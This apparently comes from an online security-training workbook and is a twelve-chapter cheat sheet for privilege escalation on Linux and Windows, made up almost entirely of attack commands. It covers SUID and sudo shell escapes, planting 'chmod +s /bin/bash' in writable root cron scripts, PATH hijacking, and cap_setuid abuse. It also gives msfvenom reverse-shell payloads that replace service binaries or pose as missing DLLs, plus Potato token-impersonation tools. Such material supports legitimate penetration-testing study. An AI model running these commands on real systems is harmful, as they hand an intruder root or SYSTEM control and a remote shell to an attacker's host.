Chapter 1 — PrivEsc Methodology

Privilege escalation follows a clear methodology: enumerate everything, identify misconfigurations, exploit the weakest link. The goal is to move from a low-privilege shell to root (Linux) or SYSTEM/Administrator (Windows). It is almost always a configuration issue, not a zero-day.

Chapter 2 — Linux Information Gathering

# System info
uname -a; cat /etc/os-release
id; whoami; groups

# Users and sudo
cat /etc/passwd
sudo -l                 # what can current user run as root?

# Interesting files
find / -writable -type f 2>/dev/null | grep -v proc
find / -perm -4000 2>/dev/null  # SUID binaries
cat /etc/crontab; ls /etc/cron*

# Network (unexposed services)
ss -tulnp

Chapter 3 — Linux SUID/SGID Abuse

# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Check every result on GTFOBins (gtfobins.github.io)

# Examples:
/bin/bash -p             # if bash is SUID

find . -exec /bin/sh -p \; -quit   # find with exec

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Chapter 4 — Linux Sudo Misconfigurations

# Check sudo permissions
sudo -l

# Exploit allowed commands
sudo vim -c ':!/bin/bash'
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo awk 'BEGIN {system("/bin/bash")}'

# LD_PRELOAD abuse (if env_keep is set in sudoers)
# Compile a shared library that spawns a root shell, load via LD_PRELOAD

Chapter 5 — Linux Cron Jobs & PATH Hijacking

# Find cron jobs running as root
cat /etc/crontab
ls -la /etc/cron.d/

# If a cron job calls a script you can write to:
echo 'chmod +s /bin/bash' >> /path/to/writable/script.sh
# Wait for cron to run, then: /bin/bash -p

# PATH hijacking — if cron uses a relative command name
echo '/bin/bash -p' > /tmp/vuln_command
chmod +x /tmp/vuln_command
export PATH=/tmp:$PATH

Chapter 6 — Linux Capabilities & NFS

# Check capabilities on binaries
getcap -r / 2>/dev/null
# cap_setuid = can change UID to root

# Python with cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# NFS no_root_squash — mount share, create SUID binary as root
showmount -e TARGET_IP

Chapter 7 — Windows Information Gathering

systeminfo
whoami /all           # privileges and groups
net user; net localgroup administrators

# Check AlwaysInstallElevated (MSI privilege escalation)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Unquoted service paths
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

Chapter 8 — Windows Service Exploits

# Check service binary permissions
sc qc VULNERABLE_SERVICE
icacls "C:\path	o\service.exe"

# If writable: replace binary with malicious payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
copy shell.exe "C:\path	o\service.exe"
sc start VULNERABLE_SERVICE

Chapter 9 — Windows Token Impersonation

# Check token privileges
whoami /priv
# SeImpersonatePrivilege = vulnerable to Potato family attacks

# PrintSpoofer (Windows 10/Server 2019+)
.\PrintSpoofer.exe -i -c cmd.exe

# JuicyPotato (older systems)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *

Chapter 10 — Windows Registry & Autoruns

# Check autorun registry keys
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check permissions on autorun binary paths
# If writable: replace with malicious executable

Chapter 11 — Windows DLL Hijacking

# Find missing DLLs loaded by services using Process Monitor
# Filter: Operation=CreateFile, Result=NAME NOT FOUND, Path ends .dll

# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll > evil.dll
copy evil.dll "C:\writable\path\missing.dll"
# Restart service to trigger execution

Chapter 12 — Automated PrivEsc Tools

# Linux
./linpeas.sh         # comprehensive Linux enumeration
./lse.sh -l 2        # Linux smart enumeration

# Windows
.\winPEAS.exe
.\PowerUp.ps1; Invoke-AllChecks   # PowerSploit
.\Seatbelt.exe -group=all         # GhostPack Seatbelt
Workbook complete! You've covered all chapters. Mark it complete below and continue your learning path.
← All Workbooks
📖
Sign in to track progress